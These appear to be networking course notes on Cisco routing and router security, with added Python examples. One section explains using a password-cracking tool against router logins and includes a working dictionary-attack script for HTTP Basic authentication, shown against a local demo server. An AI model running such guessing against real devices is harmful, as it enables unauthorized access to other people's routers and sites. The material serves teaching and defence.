[Figure: R1 with 192.168.1.0/24 on one side and 192.168.3.0/24 on the other] 

R1#show ip route 

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP 
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2 
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP 
       i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area 
       * - candidate default, U - per-user static route, o - ODR 
       P - periodic downloaded static route 

Gateway of last resort is not set 

C    192.168.1.0/24 is directly connected, FastEthernet0/0 
C    192.168.2.0/24 is directly connected, Serial0/0 
S    192.168.3.0/24 is directly connected, Serial0/0 

Routers use the routing table like a map to discover the best path for a given address. 
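How the lookup in that map actually works, as an added example that is not from the original notes and not Cisco IOS code: a longest-prefix-match over a table constructed from R1's show ip route output above. The Serial0/1 route and the destination addresses used at the end are assumptions made for the demonstration.

```python
"""Longest-prefix-match lookup over a routing table.

Added example, not part of the original notes and not Cisco IOS code. The
table below is constructed from R1's 'show ip route' output; the Serial0/1
route added at the end is an assumption made for the demonstration.
"""
from ipaddress import IPv4Address, IPv4Network
from typing import List, NamedTuple, Optional


class Route(NamedTuple):
    code: str             # C = connected, S = static, as in the IOS legend
    network: IPv4Network  # destination prefix
    interface: str        # outgoing interface


def make_route(code: str, cidr: str, interface: str) -> Route:
    """Build a Route from a CIDR string such as '192.168.1.0/24'."""
    return Route(code, IPv4Network(cidr), interface)


# Constructed from R1's table: two connected networks and one static route.
R1_TABLE: List[Route] = [
    make_route("C", "192.168.1.0/24", "FastEthernet0/0"),
    make_route("C", "192.168.2.0/24", "Serial0/0"),
    make_route("S", "192.168.3.0/24", "Serial0/0"),
]


def lookup(table: List[Route], dst: str) -> Optional[Route]:
    """Return the most specific route whose network contains dst.

    A router does not stop at the first matching entry: among all entries
    that contain the destination, the one with the longest prefix wins.
    With no match and no gateway of last resort ("Gateway of last resort is
    not set" in R1's output) the packet is dropped, signalled here by None.
    """
    addr = IPv4Address(dst)
    best: Optional[Route] = None
    for route in table:
        if addr in route.network and (
            best is None or route.network.prefixlen > best.network.prefixlen
        ):
            best = route
    return best


def forward(table: List[Route], dst: str) -> str:
    """Describe the forwarding decision for a packet addressed to dst."""
    route = lookup(table, dst)
    if route is None:
        return f"{dst}: no route, packet dropped"
    return f"{dst}: out {route.interface} via {route.code} {route.network}"


if __name__ == "__main__":
    # 192.168.4.10 lies in 192.168.4.0/24, which R1's table does not list.
    for dst in ("192.168.1.10", "192.168.3.7", "192.168.4.10"):
        print(forward(R1_TABLE, dst))
    # A more specific prefix wins over a covering one (longest prefix match).
    extended = R1_TABLE + [make_route("S", "192.168.3.128/25", "Serial0/1")]
    print(forward(extended, "192.168.3.200"))  # out Serial0/1 via S 192.168.3.128/25
    print(forward(extended, "192.168.3.7"))    # out Serial0/0 via S 192.168.3.0/24
```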


Cisco IOS Software - 

• Operating system in all of the Cisco routers and switches, which provides 
the following network services: 

• Basic routing and switching functions 

• Reliable and secure access to networked resources 

• Network scalability 


Router components - 

• CPU 
  - Executes operating system instructions 

• RAM 
  - Stores instructions and data needed by the CPU 

• ROM 
  - Boot instructions, scaled-down version of IOS 

• Flash 
  - Stores IOS, copied into RAM during the boot-up process 

• NVRAM 
  - Startup configuration file 


Router Boot-up process -

• Major phases of the router boot-up process:

1. Test the router hardware - Power-On Self Test (POST), run from ROM
2. Execute the bootstrap loader, also held in ROM
3. Locate the Cisco IOS software - normally in flash
4. Load the IOS - if no image is found in flash, try a TFTP server
5. Locate the startup configuration file - the bootstrap program looks in NVRAM
6. Load the configuration - if it is not in NVRAM, try a TFTP server
7. If no configuration file is found anywhere, enter setup mode on the console

Figure: the four stages (perform POST, load bootstrap, locate and load the Cisco Internetwork Operating System, locate and load the configuration file or enter setup mode) and where each is loaded from (ROM, ROM, flash or TFTP server, NVRAM or TFTP server or console).






IOS File System -

Figure: where each file lives

RAM    - running configuration
NVRAM  - startup configuration
Flash  - IOS image


Router interfaces

• Interface: a physical connector on the router whose main purpose is to receive and forward packets

• Interfaces connect to various types of networks, so different types of media and connectors are required

• Each interface connects to a separate network


• LAN interfaces

- Ethernet, FastEthernet

- Connect the router to a LAN

• WAN interfaces

- Serial, ISDN, Frame Relay

- Connect the router to external networks and interconnect LANs


Routing

• The process of forwarding packets to destination networks

• A router is a Layer 3 device

• Examines the destination IP address (Layer 3)

• The routing table is used to find the best path to the destination

• Forwarding decisions are based on Layer 3

• Operates at Layers 1, 2 and 3


Figure: PC1 (192.168.1.10) on 192.168.1.0/24 - R1 (Fa0/0, Fa0/1) - 192.168.2.0/24 - R2 (Fa0/0, S0/0) - 192.168.3.0/24 - R3 (S0/0, Fa0/0) - 192.168.4.0/24 - PC2 (192.168.4.10/24). A router operates at Layers 1, 2 and 3.



Routing Table - 

• Data file in RAM 

• Stores information about directly connected and remote networks 

• Contains network/next hop associations 

• Directly connected networks 

• Remote networks 

- Static routes (manually configured) 

- Dynamic routing protocols (learned from other routers) 


Static Routing 

• Configured manually 

• Specifies network address and subnet mask of remote network, and IP 
address of next hop router or exit interface 



• Use static routes when:

- The network consists of only a few routers

- The network is connected to the Internet through only one ISP

Advantages: 

• Minimal CPU processing 

• Easy to configure 

• Easier for administrator to understand 


Disadvantages: 

• Configuration and maintenance are time-consuming

• Does not scale well with growing Networks 

• Requires complete knowledge of the whole network for proper 
implementation 


Connected and Static Routes


Figure: R1 has 192.168.1.0/24 on Fa0/0 (.1) and a serial link (S0/0/0, DCE side) on 192.168.2.0/24 to a neighbour that reaches 192.168.3.0/24. The static route to 192.168.3.0/24 shows up as follows:

R1#show ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area
       * - candidate default, U - per-user static route, o - ODR
       P - periodic downloaded static route

Gateway of last resort is not set

C    192.168.1.0/24 is directly connected, FastEthernet0/0
C    192.168.2.0/24 is directly connected, Serial0/0
S    192.168.3.0/24 [1/0] via 192.168.2.2


Dynamic routing

• Routes are added to the routing table by a dynamic routing protocol

• Used by routers to share information about the reachability and status of remote networks

• Routing protocols perform several activities:

- Network discovery

- Updating and maintaining routing tables

Advantages: 

• Less administrative overhead when adding or deleting a network 

• Protocols automatically react to the topology changes 



More scalable 


Disadvantages: 

• Router resources are used (CPU cycles, memory and link bandwidth) 

• More administrator knowledge is required for configuration, verification 
and troubleshooting 


Connected, Static and Dynamic Routes


Figure: R1 (Fa0/0 .1 on 192.168.1.0/24, S0/0/0 DCE on 192.168.2.0/24) - R2 (S0/0/0 .1 on 192.168.3.0/24) - R3 (Fa0/1 .1 on 192.168.4.0/24). 192.168.3.0/24 is reached by a static route; 192.168.4.0/24 is learned dynamically through RIP:

R1#show ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, ia - IS-IS inter area
       * - candidate default, U - per-user static route, o - ODR
       P - periodic downloaded static route

Gateway of last resort is not set

C    192.168.1.0/24 is directly connected, FastEthernet0/0
C    192.168.2.0/24 is directly connected, Serial0/0/0
S    192.168.3.0/24 [1/0] via 192.168.2.2
R    192.168.4.0/24 [120/1] via 192.168.2.2, 00:00:20, Serial0/0/0



Switching Function 

• The process a router uses to accept a packet on one interface and forward it out another interface

• Decapsulate the Layer 3 packet by removing the Layer 2 frame header and trailer

• Examine the destination IP address of the packet to find the best path in the routing table

• Encapsulate the Layer 3 packet into a new Layer 2 frame and forward it on the correct interface

Example

• PC1 will send a packet to PC2


A Day in the Life of a Packet: Step 1


Figure: PC1 (192.168.1.10, MAC 0A-10) on 192.168.1.0/24 - R1 (Fa0/0 .1, MAC 00-10; Fa0/1 .1 on 192.168.2.0/24, MAC 00-20) - R2 (Fa0/0 .2, MAC 0B-31; S0/0/0 .1 on 192.168.3.0/24) - R3 (S0/0/0 .2; Fa0/0 .1 on 192.168.4.0/24, MAC 0C-22) - PC2 (192.168.4.10/24, MAC 0B-20)

PC1's ARP cache for R1:

IP address 192.168.1.1 - MAC address 00-10

Layer 2 data link frame sent by PC1:

Dest MAC 00-10 | Source MAC 0A-10 | Type 0x800 | Dest. IP 192.168.4.10 | Source IP 192.168.1.10 | IP fields | Data | Trailer


A Day in the Life of a Packet: Step 2


Figure: same topology. R1 strips the frame from PC1, looks up 192.168.4.10 in its routing table and re-encapsulates the packet's Layer 3 data, unchanged, in a new frame sent out Fa0/1 on the 192.168.2.0/24 link:

Dest MAC 0B-31 | Source MAC 00-20 | Type 0x800 | Dest. IP 192.168.4.10 | Source IP 192.168.1.10 | IP fields | Data | Trailer
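The two steps above, carried through all three routers, as an added example that is not code from the original page: the addresses and MACs are taken from the figure; the serial interface addresses (192.168.3.1 and .2) and the PCs' default gateways are assumptions the figure does not spell out. It shows what the switching function rebuilds at every hop (the Ethernet or HDLC frame, and the TTL) and what it leaves alone (the IP addresses), with longest-prefix lookup against each node's routing table.

```python
import ipaddress

# Constructed topology from the figure above. Serial links carry HDLC frames,
# which have no MAC addresses, so those interfaces are given mac=None.
NODES = {
    "PC1": {"ifaces": {"eth0": ("192.168.1.10/24", "0A-10")},
            "routes": {"0.0.0.0/0": ("eth0", "192.168.1.1")}},
    "R1":  {"ifaces": {"Fa0/0": ("192.168.1.1/24", "00-10"),
                       "Fa0/1": ("192.168.2.1/24", "00-20")},
            "routes": {"192.168.1.0/24": ("Fa0/0", None),            # connected
                       "192.168.2.0/24": ("Fa0/1", None),            # connected
                       "192.168.3.0/24": ("Fa0/1", "192.168.2.2"),   # static
                       "192.168.4.0/24": ("Fa0/1", "192.168.2.2")}}, # RIP
    "R2":  {"ifaces": {"Fa0/0": ("192.168.2.2/24", "0B-31"),
                       "S0/0/0": ("192.168.3.1/24", None)},
            "routes": {"192.168.2.0/24": ("Fa0/0", None),
                       "192.168.3.0/24": ("S0/0/0", None),
                       "192.168.1.0/24": ("Fa0/0", "192.168.2.1"),
                       "192.168.4.0/24": ("S0/0/0", "192.168.3.2")}},
    "R3":  {"ifaces": {"S0/0/0": ("192.168.3.2/24", None),
                       "Fa0/0": ("192.168.4.1/24", "0C-22")},
            "routes": {"192.168.3.0/24": ("S0/0/0", None),
                       "192.168.4.0/24": ("Fa0/0", None),
                       "0.0.0.0/0": ("S0/0/0", "192.168.3.1")}},
    "PC2": {"ifaces": {"eth0": ("192.168.4.10/24", "0B-20")},
            "routes": {"0.0.0.0/0": ("eth0", "192.168.4.1")}},
}


def lookup(routes: dict, dst: str):
    """Longest-prefix match: the most specific route wins, /0 only as a last resort."""
    ip = ipaddress.ip_address(dst)
    matches = [(ipaddress.ip_network(p), e) for p, e in routes.items()
               if ip in ipaddress.ip_network(p)]
    if not matches:
        return None
    return max(matches, key=lambda m: m[0].prefixlen)[1]


def owner_of(ip: str):
    """Stand-in for ARP: find the node and interface that hold this IP address."""
    target = ipaddress.ip_address(ip)
    for node, cfg in NODES.items():
        for ifname, (addr, mac) in cfg["ifaces"].items():
            if ipaddress.ip_interface(addr).ip == target:
                return node, ifname, mac
    raise LookupError(f"no interface owns {ip}")


def forward(src_node: str, dst_ip: str, ttl: int = 64) -> list:
    """Carry one packet hop by hop and return the Layer 2 frame built at each hop.

    The IP header keeps its addresses all the way; only the TTL changes, and the
    frame around the packet is rebuilt at every router (the switching function).
    """
    hops = []
    node = src_node
    target = ipaddress.ip_address(dst_ip)
    for _ in range(16):  # guard against routing loops
        cfg = NODES[node]
        if any(ipaddress.ip_interface(a).ip == target for a, _ in cfg["ifaces"].values()):
            return hops  # delivered: the destination is one of this node's addresses
        route = lookup(cfg["routes"], dst_ip)
        if route is None:
            raise LookupError(f"{node}: no route to {dst_ip}")
        out_if, next_hop = route
        if node.startswith("R"):
            ttl -= 1  # every router decrements TTL before forwarding
            if ttl == 0:
                raise RuntimeError(f"{node}: TTL exceeded, packet dropped")
        # Directly connected network: resolve the destination itself, not a next hop.
        nxt_node, _nxt_if, nxt_mac = owner_of(next_hop or dst_ip)
        src_mac = cfg["ifaces"][out_if][1]
        hops.append({"node": node, "out": out_if, "src_mac": src_mac, "dst_mac": nxt_mac,
                     "encap": "Ethernet" if src_mac else "HDLC", "ttl": ttl})
        node = nxt_node
    raise RuntimeError("routing loop")


if __name__ == "__main__":
    for hop in forward("PC1", "192.168.4.10"):
        print(f"{hop['node']:>3} {hop['out']:<6} {hop['encap']:<8} "
              f"src={hop['src_mac']} dst={hop['dst_mac']} ttl={hop['ttl']}")
```

Run as a script it prints the four frames: PC1's frame addressed to R1's Fa0/0, R1's frame addressed to R2's Fa0/0, an HDLC frame on the serial link, and R3's frame addressed to PC2, with the TTL falling 64, 63, 62, 61. That decrement is what traceroute relies on, and it is the only thing a plain router changes in the packet.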






IP Routing protocol 

• RIP (Routing Information Protocol) 

• IGRP (Interior Gateway Routing Protocol) 

• EIGRP (Enhanced IGRP) 

• OSPF (Open Shortest Path First) 

• IS-IS (Intermediate System-to-Intermediate System)

• BGP (Border Gateway Protocol) 


Routing Protocols 

• Routing protocols can be classified into different groups 
according to their characteristics 

- Interior Gateway Protocols (IGP) 

- Exterior Gateway Protocols (EGP) 


IGP vs. EGP Routing Protocols


Figure: two autonomous systems, System 100 and System 200. Inside each, an Interior Gateway Protocol runs (RIP, IGRP, EIGRP, OSPF or IS-IS); between them runs the Exterior Gateway Protocol, BGP.


IGP Routing Protocols 

Two classes of routing protocols: 

• Distance vector 

- Determines the direction and distance to any link in the internetwork 

• Link-state 

- Recreates the exact topology of the entire internetwork 


Distance Vector Routing Protocol 

• Periodic updates

• Slow convergence

• Learns routes from the routing tables of directly connected neighbor routers

• Adds its own distance before passing them on to other neighbors

• Distance is defined in terms of a metric, such as hop count

Link-state Routing Protocol 

• Complex database of topology information

• Knowledge of the entire network 

• Uses SPF to calculate the best path 

• Updates when changes in the topology occurs 

• Fast Convergence 

• More memory and processor overhead 

Classful Routing Protocols 

• Do not send subnet mask information in routing updates 

• Do not support variable length subnet masks (VLSM) and discontiguous 
Networks 


Classless Routing Protocols 

• Include the subnet mask in routing updates 

• Supports both VLSM and discontiguous networks 

• Required in most networks today 

Classful vs. Classless Routing


Figure (classful): 172.16.1.0/24, 172.16.2.0/24, 172.16.3.0/24, 172.16.4.0/24, 172.16.5.0/24, 172.16.6.0/24

Classful: the subnet mask is the same throughout the topology

Figure (classless): 172.16.1.32/27, 172.16.1.64/27, 172.16.1.96/27 on the LANs; 192.168.1.0/30 and 192.168.1.8/30 on the point-to-point links

Classless: the subnet mask can vary in the topology


Administrative Distance

• Administrative distance (AD) is used to choose the best path to a destination when the same network is learned from two or more different routing sources

• It measures the trustworthiness of a routing source; the route with the lowest AD is inserted in the routing table


Default administrative distances:

Route source          Default AD
Connected             0
Static                1
EIGRP summary route   5
eBGP                  20
EIGRP (internal)      90
IGRP                  100
OSPF                  110
IS-IS                 115
RIP                   120
EIGRP (external)      170
iBGP                  200


Default Routes

• Used when the router cannot match a destination network to any other route

• Means the router does not have to maintain a routing table entry for every Internet network

• Statically entered by an administrator

- ip route 0.0.0.0 0.0.0.0 {next-hop-ip | exit-interface}

• Dynamically learned using a routing protocol

- ip default-network
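Route selection as described in the Administrative Distance and Default Routes sections, as an added example that is not code from the original page: the routing table keeps every candidate a source offers, installs the one with the lowest AD per prefix, answers lookups by longest prefix with 0.0.0.0/0 as the gateway of last resort, and prints itself in the show ip route style. R1's entries are the ones shown in the figures; the RIP advertisement for 192.168.3.0/24 and the default static route (ip route 0.0.0.0 0.0.0.0 192.168.2.2) are assumptions added to show the AD decision.

```python
import ipaddress
from dataclasses import dataclass

# Default administrative distances from the table above.
AD = {"connected": 0, "static": 1, "EIGRP summary": 5, "eBGP": 20, "EIGRP": 90,
      "IGRP": 100, "OSPF": 110, "IS-IS": 115, "RIP": 120, "EIGRP external": 170, "iBGP": 200}

# Single-letter codes as printed by "show ip route".
CODE = {"connected": "C", "static": "S", "EIGRP summary": "D", "eBGP": "B", "EIGRP": "D",
        "IGRP": "I", "OSPF": "O", "IS-IS": "i", "RIP": "R", "EIGRP external": "D EX", "iBGP": "B"}


@dataclass(frozen=True)
class Route:
    prefix: str   # e.g. "192.168.3.0/24"
    source: str   # key into AD
    metric: int   # protocol metric (hop count for RIP, 0 for static)
    via: str      # next-hop address or exit interface


class RoutingTable:
    """Keeps every candidate a source has offered; the RIB is the best one per prefix."""

    def __init__(self):
        self.candidates = {}   # prefix -> {source: Route}

    def offer(self, route: Route) -> None:
        self.candidates.setdefault(route.prefix, {})[route.source] = route

    def withdraw(self, prefix: str, source: str) -> None:
        self.candidates.get(prefix, {}).pop(source, None)

    def best(self, prefix: str):
        cands = self.candidates.get(prefix)
        if not cands:
            return None
        # Lowest AD wins; the metric only breaks ties within the same source.
        return min(cands.values(), key=lambda r: (AD[r.source], r.metric))

    def rib(self) -> dict:
        return {p: self.best(p) for p in self.candidates if self.best(p) is not None}

    def lookup(self, dst: str):
        """Longest-prefix match over installed routes; 0.0.0.0/0 matches last."""
        ip = ipaddress.ip_address(dst)
        matches = [r for p, r in self.rib().items() if ip in ipaddress.ip_network(p)]
        return max(matches, key=lambda r: ipaddress.ip_network(r.prefix).prefixlen, default=None)

    def show(self) -> list:
        default = self.best("0.0.0.0/0")
        lines = ["Gateway of last resort is not set" if default is None
                 else f"Gateway of last resort is {default.via} to network 0.0.0.0"]
        for prefix, r in sorted(self.rib().items(), key=lambda kv: ipaddress.ip_network(kv[0])):
            code = CODE[r.source] + ("*" if prefix == "0.0.0.0/0" else "")
            if r.source == "connected":
                lines.append(f"{code:<5}{prefix} is directly connected, {r.via}")
            else:
                lines.append(f"{code:<5}{prefix} [{AD[r.source]}/{r.metric}] via {r.via}")
        return lines


def build_r1() -> RoutingTable:
    """R1 from the figures, plus an assumed RIP advertisement for 192.168.3.0/24
    and an assumed default static route."""
    rt = RoutingTable()
    rt.offer(Route("192.168.1.0/24", "connected", 0, "FastEthernet0/0"))
    rt.offer(Route("192.168.2.0/24", "connected", 0, "Serial0/0/0"))
    rt.offer(Route("192.168.3.0/24", "static", 0, "192.168.2.2"))
    rt.offer(Route("192.168.3.0/24", "RIP", 1, "192.168.2.2"))   # loses: AD 120 > 1
    rt.offer(Route("192.168.4.0/24", "RIP", 1, "192.168.2.2"))   # installed: no better source
    rt.offer(Route("0.0.0.0/0", "static", 0, "192.168.2.2"))
    return rt


if __name__ == "__main__":
    rt = build_r1()
    print("\n".join(rt.show()))
    print("8.8.8.8 ->", rt.lookup("8.8.8.8"))
    rt.withdraw("192.168.3.0/24", "static")   # static removed: the RIP route takes over
    print("after withdrawal:", rt.best("192.168.3.0/24"))
```

The point a practitioner should take from the AD table: a rogue RIP speaker (AD 120) cannot displace a static or connected route, but it can plant routes for prefixes the router has no better source for, exactly as the 192.168.4.0/24 entry shows. Routing-protocol authentication, and not running the protocol on interfaces that face untrusted hosts, exist for that reason.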


30. Router Bypassing


Router Password Kracker is free software to recover the lost password of your router. It can also be used to recover the password of your Internet modem or of web sites that are protected by HTTP BASIC authentication.


Routers and modems generally control access by using the HTTP BASIC authentication mechanism. In simple words, when you connect to your modem/router from the browser (typically http://192.168.1.1) you will be asked to enter a username and password. If you ever forget this password you will not be able to access your router/modem configuration. Some websites also use BASIC authentication to allow only certain users to access their site.

In these cases 'Router Password Kracker' can help you quickly recover the lost password. Penetration testers and forensic investigators can also find this tool useful for cracking router/modem/website passwords.


'Router Password Kracker' uses a simple dictionary-based password recovery technique. By default it comes with a sample dictionary file suitable for routers. Larger collections of password dictionaries (also called wordlists) are available online.

For complex passwords, you can use tools like Crunch or Cupp to generate a brute-force or custom password list file and then use it with 'Router Password Kracker'.

It works on both 32-bit and 64-bit Windows systems from Windows XP to Windows 10.


Installation & Un-installation 


Router Password Kracker comes with Installer to help in local installation & un- 
installation. This installer has intuitive wizard which guides you through series of 
steps in completion of installation. 


[Windows 32 bit] 

C:\Program Files\SecurityXploded\RouterPasswordKracker 
[Windows 64 bit] 

C:\Program Files (x86)\SecurityXploded\RouterPasswordKracker 


How to use?

Here are the simple steps

• Install 'Router Password Kracker' on any system.

• Enter the IP address of the router/modem/website whose login password you want to recover.

• Then enter the username (for example admin, user, support, etc.)

• Next select the password dictionary file by clicking on the Browse button or simply drag and drop it. You can find a sample dictionary file in the installed location.

• Finally click on 'Start Crack' to start the router password recovery.

• During the operation, you will see all statistics displayed on the screen. A message box will be displayed on success.

• At the end, you can generate a detailed report in HTML/XML/text format by clicking on the 'Report' button and then selecting the type of file from the drop-down box of the 'Save File' dialog.

Screenshots -

Screenshot 1: Router Password Kracker showing the recovered password of the router at 192.168.1.1

Screenshot 2: Detailed password recovery report generated by Router Password Kracker
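What the tool above does is a dictionary attack against HTTP Basic authentication. The following is an added example, not the tool's code and not from the original text: a local stand-in for a router admin page (the password and wordlist are constructed), the attacker loop, and the lock-out counter a real device should have. Nothing in it contacts a real device; the server is started on a loopback port chosen by the OS.

```python
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.error import HTTPError
from urllib.request import Request, urlopen


def basic_header(username: str, password: str) -> str:
    # Basic auth is just "user:pass" in base64: encoding, not encryption.
    return "Basic " + base64.b64encode(f"{username}:{password}".encode()).decode()


def start_demo_server(username: str, password: str,
                      max_failures: Optional[int] = None) -> HTTPServer:
    """Local stand-in for a router admin page guarded by HTTP Basic authentication.

    With max_failures set, the server locks out after that many wrong guesses,
    the control a real device should have and the reason dictionary attacks are noisy.
    """
    expected = basic_header(username, password)
    state = {"failures": 0}

    class AdminPage(BaseHTTPRequestHandler):
        def do_GET(self):
            if max_failures is not None and state["failures"] >= max_failures:
                self.send_response(429)            # locked out
                self.end_headers()
                return
            if self.headers.get("Authorization") == expected:
                self.send_response(200)
                self.end_headers()
                self.wfile.write(b"router configuration page")
                return
            state["failures"] += 1
            self.send_response(401)                # challenge the client
            self.send_header("WWW-Authenticate", 'Basic realm="router"')
            self.end_headers()

        def log_message(self, *args):  # keep the demo quiet
            pass

    server = HTTPServer(("127.0.0.1", 0), AdminPage)   # port 0: pick a free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def try_login(url: str, username: str, password: str) -> int:
    """Return the HTTP status for one credential pair (200 = accepted)."""
    req = Request(url, headers={"Authorization": basic_header(username, password)})
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


def dictionary_attack(url: str, username: str, wordlist) -> tuple:
    """Try each candidate in order; stop on success or on anything other than a plain 401."""
    attempts = 0
    for candidate in wordlist:
        attempts += 1
        status = try_login(url, username, candidate)
        if status == 200:
            return candidate, attempts
        if status != 401:
            break   # lock-out, rate limit or error: carrying on only makes noise
    return None, attempts


if __name__ == "__main__":
    # Constructed target password and wordlist.
    words = ["admin", "password", "1234", "tulips999"]
    srv = start_demo_server("admin", "tulips999")
    print(dictionary_attack(f"http://127.0.0.1:{srv.server_port}/", "admin", words))
    srv.shutdown()
```

Two things the example makes visible. The Authorization header carries the password in base64 on every request, so over plain HTTP anyone on the path reads it without cracking anything, which is a second reason to keep remote administration switched off. And once the server counts failures, the same wordlist that succeeds on the fourth try is stopped after three: a lock-out or rate limit turns a quiet dictionary run into a failed one.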



31. Router Security 


Secure Router Configuration - 

• Change the password used to access the router. Anything but the default is OK. 


• Turn off WPS 


• Wi-Fi security should be WPA2 with AES (do not use TKIP) 

• The Wi-Fi passwords need to be long enough to stall brute force attacks. 
Opinions on the minimum length differ, my best guess is that 14 characters should 
be sufficient. A totally random password is not necessary, "999yellowtulips" is 
both long enough and easy to remember. 

• Turn off Remote Administration (it's probably off already)

• If any of your Wi-Fi networks (a router can create more than one) use the default 
name (a.k.a. SSID) then change it. Also, if they use a name that makes it obvious 
that the network belongs to you, then change it. 

• Test the firewall in the router at Steve Gibson's ShieldsUP! site. Start with the 
Common Ports test but also do the All Service Ports test. Finally, do the Instant 
UPnP Exposure Test (orange button). 

• Use a Guest Network whenever possible. Any computer running Windows 10 
should never be allowed on the main network, always restrict them to a Guest 
Network. 

• For extra credit, turn off UPnP. If it breaks something, and port forwarding is 
beyond your ability, then you have a choice to make. 

• Periodically update the firmware and eat your vegetables 
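The checklist above maps onto a handful of settings on any access point. As an added example that is not from the original text: two constructed hostapd.conf fragments, one with the weak settings the list warns about and one corrected, together with a small audit that reports which items of the list a configuration breaks. The assumption is a Linux-based access point running hostapd (OpenWrt and many consumer routers do); the option names are hostapd's own, the SSID list and the 14-character minimum come from the checklist.

```python
# Constructed hostapd.conf fragments; only the security-relevant keys are shown.
WEAK_CONF = """\
interface=wlan0
ssid=linksys
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wpa_passphrase=password
wps_state=2
"""

HARDENED_CONF = """\
interface=wlan0
ssid=bramble-attic
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
rsn_pairwise=CCMP
wpa_passphrase=999yellowtulips
wps_state=0
"""

# Factory-default network names that reveal the vendor (and often the default
# credentials) at a glance. Constructed, non-exhaustive list.
DEFAULT_SSIDS = {"linksys", "netgear", "dlink", "default", "tp-link", "xfinity"}
MIN_PASSPHRASE = 14   # the length the checklist above settles on


def parse_conf(text: str) -> dict:
    """hostapd.conf is key=value per line; '#' starts a comment."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf


def audit(text: str) -> list:
    """Return the checklist items this configuration violates (empty list = clean)."""
    conf = parse_conf(text)
    findings = []
    wpa = int(conf.get("wpa", "0"))      # bit 0 = WPA (TKIP era), bit 1 = WPA2/RSN
    if wpa & 1:
        findings.append(f"wpa={wpa} still allows WPA1 clients; use wpa=2")
    if not wpa & 2:
        findings.append("WPA2 (wpa=2) is not enabled")
    for key in ("wpa_pairwise", "rsn_pairwise"):
        if "TKIP" in conf.get(key, "").split():
            findings.append(f"{key} allows TKIP; use CCMP (AES) only")
    if conf.get("wps_state", "0") != "0":
        findings.append(f"WPS is enabled (wps_state={conf['wps_state']}); set wps_state=0")
    if len(conf.get("wpa_passphrase", "")) < MIN_PASSPHRASE:
        findings.append(f"passphrase shorter than {MIN_PASSPHRASE} characters")
    if conf.get("ssid", "").lower() in DEFAULT_SSIDS:
        findings.append(f"SSID {conf['ssid']!r} looks like a factory default; rename it")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf) or "OK")
```

The audit is deliberately about settings, not about the device's web interface: on a router you administer through a GUI the same six questions (WPA2 only, CCMP only, WPS off, passphrase length, non-default SSID) are the ones to answer.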


Secure Router Configuration in Detail 




• Suggestions for setting up a new router 


• Setting a good router password (not WiFi password) is almost always the best 
first step for both new and existing routers 

• Selecting an unpopular range of IP addresses helps prevent many router attacks

• Don't let DHCP give out the full range of available IP addresses. Reserve some 
for static assignment. 

• Turning off features you are not using reduces the attack surface (added June 18, 
2015) 

• Be smart about choosing an SSID/network name (added July 11, 2015)

• There is more to encryption than just choosing WPA2 (added July 13, 2015) 

• Of course, upgrade the firmware (added Aug 19, 2015) 

• MUCH more to come 


32. Cyber Forensics 


Introduction -

Whereas computer forensics is defined as "the collection of techniques and tools used to find evidence in a computer",


• digital forensics has been defined as "the use of scientifically derived and proven methods toward the preservation, collection, validation, identification, analysis, interpretation, documentation, and presentation of digital evidence derived from digital sources for the purpose of facilitating or furthering the reconstruction of events found to be criminal, or helping to anticipate unauthorized actions shown to be disruptive to planned operations"

What is Cyberforensics? 

• This really depends on the point of view . . .

• Traditionally Cyber Forensics involves the

- preservation, 

- collection, 

- validation, 

- identification, 

- analysis, 

- interpretation, 

- documentation and 

- presentation 

• . . .of computer evidence stored on a computer . . . 

• “Forensics is the application of science to the 
legal process.” 

- Jim Christy, DDCI 


View Point


Figure: the perspectives that meet in digital forensic research - Law Enforcement, Courts, Critical Infrastructure Protection, Information Warfare, Military Operations, Business and Industry.

Viewpoint -

• Each perspective has different objectives; even though there is overlap, the approaches of each remain mainly ad hoc and uncoordinated

• Technology is vendor-driven

• No industry certification

• No standards

- ASCLD/LAB - for labs

• Interesting situations with the court system

- Who is more believable?

- Evidence isn't questioned


Coverage from OS perspective 

• Windows 

- 95% of cases involve Windows (FBI) 

- Topics 


• File systems: FAT & NTFS 

• Multiple tools: 

- Commercial 

- Freeware 

» Windows & Linux 

• Live response 

• Network forensics 


Cybercrime & Cyberwarfare - 

• “Information warfare specialists at the Pentagon estimate that a properly prepared and well-coordinated attack by fewer than 30 computer virtuosos strategically located around the world, with a budget of less than $10 million, could bring the United States to its knees.”

• “Such a strategic attack, mounted by a cyberterrorist group, either 
substate or nonstate actors, would shut down everything from electric 
power grids to air traffic control centers.” 


Chain-of-custody 

• How to bag & tag electronic evidence? 

- Cryptographic hash of the electronic file 

- More on this stuff a bit later 

- Time & date stamp before and after capture 




Handling Evidence 

• Chain-of-Custody 

- Goal is to protect the integrity of your evidence 

- Make it difficult for the defense attorney to successfully argue that the evidence was tampered with while it was in your custody

• Document following questions 

- Who collected the evidence? 

- How was it collected? From where was it collected? 

- Who took possession of it? 

- How was it stored and protected in storage? 

- Who took it out of storage and why? 


